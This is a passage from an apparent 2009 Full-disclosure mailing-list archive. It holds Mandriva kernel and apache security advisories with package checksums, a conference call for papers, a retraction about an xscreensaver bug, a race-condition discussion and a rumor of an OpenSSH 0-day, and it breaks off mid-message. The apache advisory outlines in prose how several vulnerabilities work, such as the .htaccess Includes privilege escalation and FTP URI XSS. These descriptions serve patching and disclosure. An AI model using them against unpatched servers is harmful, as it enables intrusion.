2009.1/x86_64/libafs-kernel-2.6.29.6-desktop-1mnb-1.4.10-1mdv2009.1.x86_64.rpm 43f634280d2bd08df0e57f291d908e94 2009.1/x86_64/libafs-kernel-2.6.29.6-server-1mnb-1.4.10-1mdv2009.1.x86_64.rpm f1b016b0a8909e870af30ecc1d7b6cf9 2009.1/x86_64/libafs-kernel-desktop-latest-1.4.10-1.20090706.1mdv2009.1.x86_64.rpm 0d7ea07c019c9721df590ca35c5132b2 2009.1/x86_64/libafs-kernel-server-latest-1.4.10-1.20090706.1mdv2009.1.x86_64.rpm 8072a589ab91f96c80116ca098141e29 2009.1/x86_64/lirc-kernel-2.6.29.6-desktop-1mnb-0.8.5-0.20090320.1mdv2009.1.x86_64.rpm d3e0241b3e974cd400023e6358ca99b7 2009.1/x86_64/lirc-kernel-2.6.29.6-server-1mnb-0.8.5-0.20090320.1mdv2009.1.x86_64.rpm f546409db5889271f5bcbc00f06e82e2 2009.1/x86_64/lirc-kernel-desktop-latest-0.8.5-1.20090706.0.20090320.1mdv2009.1.x86_64.rpm ca822e477e0e2422fa730f4775d2ef30 2009.1/x86_64/lirc-kernel-server-latest-0.8.5-1.20090706.0.20090320.1mdv2009.1.x86_64.rpm ae9c7b63de2a0e6d078078d9d8e91b83 2009.1/x86_64/lzma-kernel-2.6.29.6-desktop-1mnb-4.43-27.1mdv2009.1.x86_64.rpm f109e5aa682e0f1b1ef8fa009bc90055 2009.1/x86_64/lzma-kernel-2.6.29.6-server-1mnb-4.43-27.1mdv2009.1.x86_64.rpm c4eb799cf26fcd9a83afcce72a4aae65 2009.1/x86_64/lzma-kernel-desktop-latest-4.43-1.20090706.27.1mdv2009.1.x86_64.rpm 33fbc84b60259c0c187d9abb68030de1 2009.1/x86_64/lzma-kernel-server-latest-4.43-1.20090706.27.1mdv2009.1.x86_64.rpm b4a163e4736b628d4e32278a4a79dba7 2009.1/x86_64/madwifi-kernel-2.6.29.6-desktop-1mnb-0.9.4-4.r3998mdv2009.1.x86_64.rpm 6c8aad60a7a98198401e63b856f6fffc 2009.1/x86_64/madwifi-kernel-2.6.29.6-server-1mnb-0.9.4-4.r3998mdv2009.1.x86_64.rpm 491f89289951c2a92521465661945f89 2009.1/x86_64/madwifi-kernel-desktop-latest-0.9.4-1.20090706.4.r3998mdv2009.1.x86_64.rpm 1d7224a5706d5d426fed90244caa0430 2009.1/x86_64/madwifi-kernel-server-latest-0.9.4-1.20090706.4.r3998mdv2009.1.x86_64.rpm 957fd18a3ee494f1abc2ca3b07b24717 2009.1/x86_64/netfilter-rtsp-kernel-2.6.29.6-desktop-1mnb-2.6.26-2mdv2009.1.x86_64.rpm 42a8cf1cb1a07cf020050d65f53861e1 2009.1/x86_64/netfilter-rtsp-kernel-2.6.29.6-server-1mnb-2.6.26-2mdv2009.1.x86_64.rpm 52b3d8191e9cdb7f251ce73d99de8358 2009.1/x86_64/netfilter-rtsp-kernel-desktop-latest-2.6.26-1.20090706.2mdv2009.1.x86_64.rpm 9696aa95d578a4367a0bda5396e0b644 2009.1/x86_64/netfilter-rtsp-kernel-server-latest-2.6.26-1.20090706.2mdv2009.1.x86_64.rpm ae33114cbf90eccac0026aa3ed4f43d8 2009.1/x86_64/nouveau-kernel-2.6.29.6-desktop-1mnb-0.0.12-0.20090329.1mdv2009.1.x86_64.rpm 87028fbc7b74334fbfc00fc2317c19e2 2009.1/x86_64/nouveau-kernel-2.6.29.6-server-1mnb-0.0.12-0.20090329.1mdv2009.1.x86_64.rpm 6125161652525441ddaebe3b8268fa70 2009.1/x86_64/nouveau-kernel-desktop-latest-0.0.12-1.20090706.0.20090329.1mdv2009.1.x86_64.rpm 096130cf65b016dc446f0d10eba4e9cd 2009.1/x86_64/nouveau-kernel-server-latest-0.0.12-1.20090706.0.20090329.1mdv2009.1.x86_64.rpm 9a5b4eaad5d9d8110d676b8aa44aa013 2009.1/x86_64/nvidia173-kernel-2.6.29.6-desktop-1mnb-173.14.18-2mdv2009.1.x86_64.rpm 5a85a51a6852309c0bd18e5327b32333 2009.1/x86_64/nvidia173-kernel-2.6.29.6-server-1mnb-173.14.18-2mdv2009.1.x86_64.rpm 14ea8999874519bc61bbcd10e0c43750 2009.1/x86_64/nvidia173-kernel-desktop-latest-173.14.18-1.20090706.2mdv2009.1.x86_64.rpm e89195e18bbcfdc5f1833e8ac5540e27 2009.1/x86_64/nvidia173-kernel-server-latest-173.14.18-1.20090706.2mdv2009.1.x86_64.rpm 07a8985b868bd0d36ee4afc91d177cbf 2009.1/x86_64/nvidia96xx-kernel-2.6.29.6-desktop-1mnb-96.43.11-5mdv2009.1.x86_64.rpm a2658e17007a154720444838917b7479 2009.1/x86_64/nvidia96xx-kernel-2.6.29.6-server-1mnb-96.43.11-5mdv2009.1.x86_64.rpm 98e030171164941b270d794f8e7f9a3e 2009.1/x86_64/nvidia96xx-kernel-desktop-latest-96.43.11-1.20090706.5mdv2009.1.x86_64.rpm eee6070855324faaeafb4924acac437b 2009.1/x86_64/nvidia96xx-kernel-server-latest-96.43.11-1.20090706.5mdv2009.1.x86_64.rpm 2efa8322248700df7eb36840dadf5b2d 2009.1/x86_64/nvidia-current-kernel-2.6.29.6-desktop-1mnb-180.51-1mdv2009.1.x86_64.rpm 47dd49241e62d3fdede08a9bbeab6904 2009.1/x86_64/nvidia-current-kernel-2.6.29.6-server-1mnb-180.51-1mdv2009.1.x86_64.rpm d4d173ef89f6c739c60d4fab6759a331 2009.1/x86_64/nvidia-current-kernel-desktop-latest-180.51-1.20090706.1mdv2009.1.x86_64.rpm 5db0d80dd7f32c7156615e6fa1c31520 2009.1/x86_64/nvidia-current-kernel-server-latest-180.51-1.20090706.1mdv2009.1.x86_64.rpm 92f69e400f24a937c575ce9f494dc14f 2009.1/x86_64/opencbm-kernel-2.6.29.6-desktop-1mnb-0.4.2a-4mdv2009.1.x86_64.rpm f84a11dee01b100c82b39895f91f59bd 2009.1/x86_64/opencbm-kernel-2.6.29.6-server-1mnb-0.4.2a-4mdv2009.1.x86_64.rpm 68599bfe0a0a8ad3a671761408403a7e 2009.1/x86_64/opencbm-kernel-desktop-latest-0.4.2a-1.20090706.4mdv2009.1.x86_64.rpm 7bc986caf0691b59d794a50d75e83dfa 2009.1/x86_64/opencbm-kernel-server-latest-0.4.2a-1.20090706.4mdv2009.1.x86_64.rpm 641f4af38e1e2186fd2cb3955e601fa6 2009.1/x86_64/rt2870-kernel-2.6.29.6-desktop-1mnb-1.4.0.0-1mdv2009.1.x86_64.rpm 495a1d0d118d499190b7eb8505740ab6 2009.1/x86_64/rt2870-kernel-2.6.29.6-server-1mnb-1.4.0.0-1mdv2009.1.x86_64.rpm 3f936fef123921f555a5fcd2995a47a9 2009.1/x86_64/rt2870-kernel-desktop-latest-1.4.0.0-1.20090706.1mdv2009.1.x86_64.rpm 20bedde49f3d20454af64cc68df767c1 2009.1/x86_64/rt2870-kernel-server-latest-1.4.0.0-1.20090706.1mdv2009.1.x86_64.rpm c624864f54152ef9628c1f895559518a 2009.1/x86_64/squashfs-kernel-2.6.29.6-desktop-1mnb-3.4-1mdv2009.1.x86_64.rpm 9f9d7ac6b06123ac3ca693b51d6dd75b 2009.1/x86_64/squashfs-kernel-2.6.29.6-server-1mnb-3.4-1mdv2009.1.x86_64.rpm 8430e173b5e5a42b9e48ba5a27ab9af5 2009.1/x86_64/squashfs-kernel-desktop-latest-3.4-1.20090706.1mdv2009.1.x86_64.rpm f85eb6bb3c2a9a20bafa1caba8e3007c 2009.1/x86_64/squashfs-kernel-server-latest-3.4-1.20090706.1mdv2009.1.x86_64.rpm d2c9aa8a71c726ef5a662f5885a9c1e0 2009.1/x86_64/squashfs-lzma-kernel-2.6.29.6-desktop-1mnb-3.3-10mdv2009.1.x86_64.rpm 2315678f10e26e601357c769325e5709 2009.1/x86_64/squashfs-lzma-kernel-2.6.29.6-server-1mnb-3.3-10mdv2009.1.x86_64.rpm 253f27691ba8601b5013e6b9c3bc7d6a 2009.1/x86_64/squashfs-lzma-kernel-desktop-latest-3.3-1.20090706.10mdv2009.1.x86_64.rpm 967c184e3d66b185b37078cfceb505e8 2009.1/x86_64/squashfs-lzma-kernel-server-latest-3.3-1.20090706.10mdv2009.1.x86_64.rpm fc3c5091b0345acde23f4db6b514ad2c 2009.1/x86_64/tp_smapi-kernel-2.6.29.6-desktop-1mnb-0.40-2mdv2009.1.x86_64.rpm 1e349c03f8d93a5f654a2d8c47205588 2009.1/x86_64/tp_smapi-kernel-2.6.29.6-server-1mnb-0.40-2mdv2009.1.x86_64.rpm 906c3c4bf4bf1d22ec4dcbfe25582eb8 2009.1/x86_64/tp_smapi-kernel-desktop-latest-0.40-1.20090706.2mdv2009.1.x86_64.rpm 8955e64828243e38095d479cc4e4f64d 2009.1/x86_64/tp_smapi-kernel-server-latest-0.40-1.20090706.2mdv2009.1.x86_64.rpm 2dea34736f4e9ee2d6728bd9d1012bdb 2009.1/x86_64/vboxadditions-kernel-2.6.29.6-desktop-1mnb-2.2.0-4mdv2009.1.x86_64.rpm f7b7eef37de33bbc5ca9d600f96a14fe 2009.1/x86_64/vboxadditions-kernel-2.6.29.6-server-1mnb-2.2.0-4mdv2009.1.x86_64.rpm 6d8e55590bb79bd1b9b1cbc67300127d 2009.1/x86_64/vboxadditions-kernel-desktop-latest-2.2.0-1.20090706.4mdv2009.1.x86_64.rpm dcaca38a8f6d6a344f208f00e6c366b4 2009.1/x86_64/vboxadditions-kernel-server-latest-2.2.0-1.20090706.4mdv2009.1.x86_64.rpm ff6d1131bb73cfee0c9c7d55fbce9727 2009.1/x86_64/vhba-kernel-2.6.29.6-desktop-1mnb-1.2.1-2mdv2009.1.x86_64.rpm 56ea580c5bc03ff9be9fd7c5f64f7c25 2009.1/x86_64/vhba-kernel-2.6.29.6-server-1mnb-1.2.1-2mdv2009.1.x86_64.rpm 22e13c82824d82fa5d18c57a8c6f6d28 2009.1/x86_64/vhba-kernel-desktop-latest-1.2.1-1.20090706.2mdv2009.1.x86_64.rpm 5273652c81d1c4d692bb144ccd8a1eb9 2009.1/x86_64/vhba-kernel-server-latest-1.2.1-1.20090706.2mdv2009.1.x86_64.rpm d90930d3010e0b87bb42731ce94f98b6 2009.1/x86_64/virtualbox-kernel-2.6.29.6-desktop-1mnb-2.2.0-4mdv2009.1.x86_64.rpm dc5327f8992f4803eb475465e6d4e0fc 2009.1/x86_64/virtualbox-kernel-2.6.29.6-server-1mnb-2.2.0-4mdv2009.1.x86_64.rpm bd4f499eb9711927f93d659874eb7f3c 2009.1/x86_64/virtualbox-kernel-desktop-latest-2.2.0-1.20090706.4mdv2009.1.x86_64.rpm 700b5a8364205f33466f88be36751fb9 2009.1/x86_64/virtualbox-kernel-server-latest-2.2.0-1.20090706.4mdv2009.1.x86_64.rpm 84fe580252832e385a40bcea63781a79 2009.1/x86_64/vpnclient-kernel-2.6.29.6-desktop-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm f2dfc5914c61a34a313b61c71948058e 2009.1/x86_64/vpnclient-kernel-2.6.29.6-server-1mnb-4.8.01.0640-3mdv2009.0.x86_64.rpm 6e15d5f42c2f7c82a65e70bcef1963ca 2009.1/x86_64/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20090706.3mdv2009.0.x86_64.rpm d8ac68d513c915e91253ca48e4265906 2009.1/x86_64/vpnclient-kernel-server-latest-4.8.01.0640-1.20090706.3mdv2009.0.x86_64.rpm 717afe0227c203e47d079595bf5924f7 2009.1/SRPMS/kernel-2.6.29.6-1mnb2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKU281mqjQ0CJFipgRAt+TAJ4nBTmsK1AOa7Gd0gbtfcsDsoOGgACgtFl8 Jkc8K6HcNvzuDKLk1mZlW8w= =la6T -----END PGP SIGNATURE----- From security at mandriva.com Wed Jul 8 03:21:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Wed, 08 Jul 2009 04:21:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:124-1 ] apache Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:124-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apache Date : July 8, 2009 Affected: 2008.1 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in apache: Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm (CVE-2008-1678). Note that this security issue does not really apply as zlib compression is not enabled in the openssl build provided by Mandriva, but apache is patched to address this issue anyway (conserns 2008.1 only). Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via wildcards in a pathname in an FTP URI (CVE-2008-2939). Note that this security issue was initially addressed with MDVSA-2008:195 but the patch fixing the issue was added but not applied in 2009.0. The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file (CVE-2009-1195). This update provides fixes for these vulnerabilities. Update: The patch for fixing CVE-2009-1195 for Mandriva Linux 2008.1 was incomplete, this update addresses the problem. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1678 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1195 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: d7522600c193783ccb5f41447175a331 2008.1/i586/apache-base-2.2.8-6.4mdv2008.1.i586.rpm 9ca131724b9fd905f7ac864d4511b459 2008.1/i586/apache-devel-2.2.8-6.4mdv2008.1.i586.rpm e7750b82d83fdd68225f663679ac4460 2008.1/i586/apache-htcacheclean-2.2.8-6.4mdv2008.1.i586.rpm e28b73346363d5183bf43b9a894703eb 2008.1/i586/apache-mod_authn_dbd-2.2.8-6.4mdv2008.1.i586.rpm 03d7b234afa3a83f04fd2dd951359961 2008.1/i586/apache-mod_cache-2.2.8-6.4mdv2008.1.i586.rpm 506e31a2a592818cb6b9ca9417902562 2008.1/i586/apache-mod_dav-2.2.8-6.4mdv2008.1.i586.rpm 1f79c942c9f477eb7af43fa0bbf7f75d 2008.1/i586/apache-mod_dbd-2.2.8-6.4mdv2008.1.i586.rpm 942abf88d6fa0b73b587c3cf2920c55b 2008.1/i586/apache-mod_deflate-2.2.8-6.4mdv2008.1.i586.rpm d3b92574868f79d02a5189fdcd6df425 2008.1/i586/apache-mod_disk_cache-2.2.8-6.4mdv2008.1.i586.rpm cf6ce38ae0f100a35e39fb3b09be7507 2008.1/i586/apache-mod_file_cache-2.2.8-6.4mdv2008.1.i586.rpm c5ed7754beb38dd51b68bbd6604a0ca9 2008.1/i586/apache-mod_ldap-2.2.8-6.4mdv2008.1.i586.rpm 9d29c79f0b889aeca78c7b426073cd3e 2008.1/i586/apache-mod_mem_cache-2.2.8-6.4mdv2008.1.i586.rpm 84a1b51f4d8be06ab763bb95b572909f 2008.1/i586/apache-mod_proxy-2.2.8-6.4mdv2008.1.i586.rpm 78723bd3586753bcb37ac83a9f8449f7 2008.1/i586/apache-mod_proxy_ajp-2.2.8-6.4mdv2008.1.i586.rpm 5418461f01217d6567ce4cc27e8b95bf 2008.1/i586/apache-mod_ssl-2.2.8-6.4mdv2008.1.i586.rpm 439787696a120705c0b79ac7f8a5c538 2008.1/i586/apache-modules-2.2.8-6.4mdv2008.1.i586.rpm 8275595502f0ad78166b8d060e2d9b3c 2008.1/i586/apache-mod_userdir-2.2.8-6.4mdv2008.1.i586.rpm 0b3edd8559484552cdad948faef19203 2008.1/i586/apache-mpm-event-2.2.8-6.4mdv2008.1.i586.rpm 1fa2b3101a3b34c2d0f9fc817bc1a1df 2008.1/i586/apache-mpm-itk-2.2.8-6.4mdv2008.1.i586.rpm 2b6e72b32712a335b1678f492842d2fc 2008.1/i586/apache-mpm-prefork-2.2.8-6.4mdv2008.1.i586.rpm 3c1e840a0fa813e1057effba641959b7 2008.1/i586/apache-mpm-worker-2.2.8-6.4mdv2008.1.i586.rpm 043d5127cea48a3eeab8faa4875cf084 2008.1/i586/apache-source-2.2.8-6.4mdv2008.1.i586.rpm da999274b381e43a575829d178c8bf6d 2008.1/SRPMS/apache-2.2.8-6.4mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 30fbbec5b54767fb1163d24a85caa017 2008.1/x86_64/apache-base-2.2.8-6.4mdv2008.1.x86_64.rpm 8998a37f170228812f7335a6d1c137ed 2008.1/x86_64/apache-devel-2.2.8-6.4mdv2008.1.x86_64.rpm e0a8fbfe76fa2c8cb16ef4726155bf0b 2008.1/x86_64/apache-htcacheclean-2.2.8-6.4mdv2008.1.x86_64.rpm a8bfb98f0354d15b1e5b33df2a06079a 2008.1/x86_64/apache-mod_authn_dbd-2.2.8-6.4mdv2008.1.x86_64.rpm 97ce6d10fea3d251f0a1a6038dcc04e3 2008.1/x86_64/apache-mod_cache-2.2.8-6.4mdv2008.1.x86_64.rpm efe82f8b6e60ab89bb6a043bebd47973 2008.1/x86_64/apache-mod_dav-2.2.8-6.4mdv2008.1.x86_64.rpm 7acf0e9e13cd0a442c32dc33427569e5 2008.1/x86_64/apache-mod_dbd-2.2.8-6.4mdv2008.1.x86_64.rpm 71a503f117bebfda8db53b929499b6d8 2008.1/x86_64/apache-mod_deflate-2.2.8-6.4mdv2008.1.x86_64.rpm 098266a9b737c0aa974e9818bc843531 2008.1/x86_64/apache-mod_disk_cache-2.2.8-6.4mdv2008.1.x86_64.rpm 2d90465f7a75a794bf333129b8e105c7 2008.1/x86_64/apache-mod_file_cache-2.2.8-6.4mdv2008.1.x86_64.rpm 6778a8746ba0b543dc3aebdab9fc6f08 2008.1/x86_64/apache-mod_ldap-2.2.8-6.4mdv2008.1.x86_64.rpm 2a9d64c016f1beb2ccbbd5c5b9e0b8df 2008.1/x86_64/apache-mod_mem_cache-2.2.8-6.4mdv2008.1.x86_64.rpm 3777616f0f0771c96921b83af29c9fa8 2008.1/x86_64/apache-mod_proxy-2.2.8-6.4mdv2008.1.x86_64.rpm 657dfd4b249cb59834957373acca4f89 2008.1/x86_64/apache-mod_proxy_ajp-2.2.8-6.4mdv2008.1.x86_64.rpm e05f1450a507379bd4f394f739e0fc60 2008.1/x86_64/apache-mod_ssl-2.2.8-6.4mdv2008.1.x86_64.rpm 1832c96d6d0a1bff8bc84f7463f92ccf 2008.1/x86_64/apache-modules-2.2.8-6.4mdv2008.1.x86_64.rpm ef96e999154ac771c47e760a7a978460 2008.1/x86_64/apache-mod_userdir-2.2.8-6.4mdv2008.1.x86_64.rpm 0312ba63abb5816f8077a14b201ee989 2008.1/x86_64/apache-mpm-event-2.2.8-6.4mdv2008.1.x86_64.rpm 0fc10dbdcc127018954280312e6ddd2b 2008.1/x86_64/apache-mpm-itk-2.2.8-6.4mdv2008.1.x86_64.rpm 1178cf5ee9c13d0320f8d334707240f7 2008.1/x86_64/apache-mpm-prefork-2.2.8-6.4mdv2008.1.x86_64.rpm b52a6d91a14cfda1080af5fe16cbb479 2008.1/x86_64/apache-mpm-worker-2.2.8-6.4mdv2008.1.x86_64.rpm 909f1aeafcf101c0af655c13809731d6 2008.1/x86_64/apache-source-2.2.8-6.4mdv2008.1.x86_64.rpm da999274b381e43a575829d178c8bf6d 2008.1/SRPMS/apache-2.2.8-6.4mdv2008.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKU9d5mqjQ0CJFipgRAlzsAJ0Zpu0rH8JBOfgOJFqA9Tl3H1eJTwCfeA+M +JKiXIAM+zbCDRymCVguXjo= =66R9 -----END PGP SIGNATURE----- From kalvin.dai at gmail.com Wed Jul 8 04:24:48 2009 From: kalvin.dai at gmail.com (Kalvin Dai) Date: Tue, 7 Jul 2009 23:24:48 -0400 Subject: [Full-disclosure] Call for Papers - the 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09) Message-ID: <718372d40907072024t387dc124j7c91b8b08ee8f52d@mail.gmail.com> Dear Professor or Colleague: We apologize if you have received duplicate Call for Papers. You are invited to submit papers for the 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09). The 2nd IEEE International Symposium on Ubisafe Computing (UbiSafe-09), Sponsored by IEEE CS TCSC, will be held in Chengdu, China, December 12-14, 2009. More infomation can be found in http://cs.okstate.edu/ubisafe09/ . In conjuction with the 8th IEEE International Conference on Dependable, Autonomic and Secure Computing (DASC09) and the 8th IEEE International Conference on Pervasive Intelligence and Computing(PICom09) IMPORTANT DEADLINES: Submission Deadline: Aug. 15, 2009 Author Notification: Sep. 30, 2009 Final Manuscript Due: Oct. 15, 2009 SYMPOSIUM INFORMATION: Computers are now available anytime, anywhere, by different means, and distributed unobtrusively throughout the everyday environments in which physical objects/artifacts embedded with invisible computers are sensible and networked locally and globally. Such "any" computers open tremendous opportunities to provide numerous novel services/applications in both real world and cyber spaces, and exist ubiquitously in our daily life, working, learning, traveling, entertainment, medicine, etc. Although it is yet unclear what exactly the real-cyber integrated worlds would be, there is no doubt that they must be safe. UbiSafe emphasizes the SAFE aspects for ubiquitous, pervasive, AmI, mobile, universal, embedded, wearable, augmented, invisible, hidden, context-aware, sentient, proactive, autonomic, or whatever it is called, computing. UbiSafe computing is focused on theories and technologies for ubiquitous artifacts to function safely for different purposes; for ubiquitous systems to work safely in various situations; and for ubiquitous environments to behave safely with all people. A series of challenges exist to let people benefit from ubiquitous services, and simultaneously guarantee their safety in making ubiquitous safe artifacts, systems, and environments. Following the great success of UbiSafe-07 held at Niagara Falls, Canada, 2007, the UbiSafe-09 Symposium provides a forum for engineers and scientists in academia, industry, and government to address all safety related profound challenges including technical, social, legal and ethical issues, and to present and discuss their ideas, theories, technologies, systems, tools, applications, work in progress and experience on all aspects of UbiSafe computing. Topics of particular interest include, but are not limited to: * Fundamentals - UbiSafe concepts, definitions, basic elements, models, frameworks and methodologies, human-centric paradigms, multi-disciplinary/inter-disciplinary/trans-disciplinary approaches, semantics, ontologies, UbiSafe requirements and formal specifications and validations, information assurance, etc. * Technologies - Security and privacy protection, reliability and fault tolerance, risk analysis, uncertainty and exception handling, socially intelligent agents, intuitive/natural user interface, interaction design, context-awareness, intelligent computing, service-oriented computing, hardware, software, middleware, etc. * Systems - Embedded systems, wearable systems, augmented systems, context-based systems, communication systems, safety-critical systems, survivable systems, persistent systems, autonomous/autonomic systems, proactive systems, network infrastructure, sensor networks, etc. * Applications - Smart objects, smart environments, information appliance and artifacts, everyday gadgets, robots, safety care, healthcare, medical care and services, working, learning, traveling, entertainment, case studies, etc. * Measures and Assessments - UbiSafe attributes and measures for safety, trust, faith, amenity, easiness, comfort, satisfaction and worryness, UbiSafe levels and relations, UbiSafe quality, assessment criteria and authority, subjective and objective assessment standards, evaluation methodologies, testing, measuring and monitoring tools, etc. * Human Factors and Social Issues - Human and social aspects of UbiSafe, UbiSafe sources and factors, social rules, regulations and laws, human factors, human behavior analysis, modeling of human feelings, traditional and cultural issues, ethical issues, etc. SUBMISSION INFORMATION: Submit full papers not exceeding 8 pages in PDF format (IEEE Computer Society Proceedings Manuscripts style: two columns, single-spaced), including figures and references, using 10 fonts, and number each page. You can download the IEEE CS Proceedings Author Guidelines from the following web site ftp://pubftp.computer.org/press/outgoing/proceedings/. UbiSafe-09 submission web site is at http://cse.stfx.ca/~ubisafe09/sub . PAPER PUBLICATION: Authors of accepted papers will receive guidelines on preparing and submitting the final manuscript(s) together with the notification of acceptance. The proceedings will be published by IEEE Computer Society Press. Authors of accepted papers, or at least one of them, are required to register and present their work at the conference, otherwise their papers will be removed from the digital library after the conference. Distinguished papers, after further revisions, will be published in one of the following journals: Security and Communication Networks (SCN), Journal of Autonomic and Trusted Computing (JoATC), and the Journal of Ubiquitous Computing and Intelligence (JUCI). GENERAL INFORMATION: GENERAL CHAIRS Xiaolin (Andy) Li, Oklahoma State University, USA Guojun Wang, Central South University, China Vijay Varadharajan, Macquarie University, Australia PROGRAM CHAIRS Ping Yang, SUNY Binghamton, USA Zhiwen Yu, Northwestern Polytech Univ., China Fabrizio Baiardi, University of Pisa, Italy STEERING COMMITTEE Vipin Chaudhary, University at Buffalo, SUNY, USA Jingde Cheng, Saitama University, Japan Thomas Grill, Johannes Kepler Univ. Linz, Austria Runhe Huang, Hosei University, Japan Ismail Khalil, Johannes Kepler Univ. Linz, Austria Qun Jin, Waseda University, Japan Xiaolin (Andy) Li, Oklahoma State University, USA Jianhua Ma, Hosei University, Japan Laurence T. Yang, St. Francis Xavier University, Canada Qiangfu Zhao, The University of Aizu, Japan PUBLICITY CHAIRS Xiaole Bai, Ohio State University, USA Emmanuelle Anceaume, IRISA, France PROGRAM COMMITTEE MEMBERS: See UbiSafe-09 web site: http://cs.okstate.edu/ubisafe09/ For further information please email to: ubisafe09 at googlegroups.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090707/4c4fb1c0/attachment.html From kcope2 at googlemail.com Wed Jul 8 10:51:24 2009 From: kcope2 at googlemail.com (Kingcope) Date: Wed, 8 Jul 2009 11:51:24 +0200 Subject: [Full-disclosure] Oops! About xscreensaver 5.01 In-Reply-To: <72f8221d0907060611w5ac28d77h113393dd6c926a6d@mail.gmail.com> References: <72f8221d0907060527m4786e996j79dbd957b359bd89@mail.gmail.com> <72f8221d0907060611w5ac28d77h113393dd6c926a6d@mail.gmail.com> Message-ID: <72f8221d0907080251t7d0b9848mc2dc75ba73ed27a3@mail.gmail.com> Hello again, The described xscreensaver vulnerability affects Opensolaris (11 for sure, maybe 10 also) xscreensaver 5.01 builds ONLY. I could not reproduce the vuln on FreeBSD or Linux. (This is getting boring I know, have a nice day) Thanks and Best Regards, Nikolaos Rangos 2009/7/6 Kingcope : > Hmmm, > sorry for flooding the list but it seems it doesnt even affect > xscreensaver 5.01. > I will investigate when the vuln when I have time and keep you informed. > There has to be some strange conf on my Opensolaris :) > > Best Regards, > > kcope > > 2009/7/6 Kingcope : >> Hello list, >> Just to clarify, I tested some operating systems against the >> xscreensaver vulnerability >> I posted yesterday. >> It affects at least xscreensaver 5.01. >> >> It does not affect recent versions as reported >> by the Debian bug tracking people, this is confirmed. >> >> Sorry about not catching this. >> >> Best Regards, >> /nr >> > From fw at deneb.enyo.de Wed Jul 8 13:35:49 2009 From: fw at deneb.enyo.de (Florian Weimer) Date: Wed, 08 Jul 2009 14:35:49 +0200 Subject: [Full-disclosure] [Code-Crunchers] a simple race condition and how you'd solve it In-Reply-To: <12004.1246586666@turing-police.cc.vt.edu> (Valdis Kletnieks's message of "Thu, 02 Jul 2009 22:04:26 -0400") References: <4A4D4FF3.8070101@linuxbox.org> <5e01c29a0907021801i2c38a62cxf07bb3190d825d94@mail.gmail.com> <12004.1246586666@turing-police.cc.vt.edu> Message-ID: <87y6qzs66y.fsf@mid.deneb.enyo.de> * Valdis Kletnieks: > And to be honest - the "best" way of fixing this is *really* going to depend on > the relative weight of locking (which can be *very* different if you have 2 > threads on 2 CPUs, or 4096 threads on a 4096-core monster, or are split across > systems possibly in different countries connected by a high or maybe low speed > network), and how much effort goes into the computation, and how much > correctness matters Right. And in general, it doesn't make sense to reinvent the wheel. The platform probably has got some sort of ivar or future which takes care of the synchronization/blocking. (If it doesn't, you should implement that abstraction first.) Unless the computation is very, very cheap (or requests are truly random), you want other threads to block until the result computed in the initial thread becomes available---without busy waiting. From martins.listz at gmail.com Wed Jul 8 21:00:17 2009 From: martins.listz at gmail.com (Martin Spinassi) Date: Wed, 08 Jul 2009 17:00:17 -0300 Subject: [Full-disclosure] [Rumor] SSH 0-day Message-ID: <1247083217.11750.14.camel@kr0sty.livra.local> Hi list, I've been reading around (openssh mailing list, some forums, etc.) a rumor about a 0-day exploit in openssh. Does anybody knows if there is *really* something like this in the wild? Cheers Martin From suicidalbob at gmail.com Wed Jul 8 21:22:49 2009 From: suicidalbob at gmail.com (Ben Rosenberg) Date: Wed, 8 Jul 2009 13:22:49 -0700 Subject: [Full-disclosure] [Rumor] SSH 0-day In-Reply-To: <1247083217.11750.14.camel@kr0sty.livra.local> References: <1247083217.11750.14.camel@kr0sty.livra.local> Message-ID: See here: http://lwn.net/Articles/340483/ On 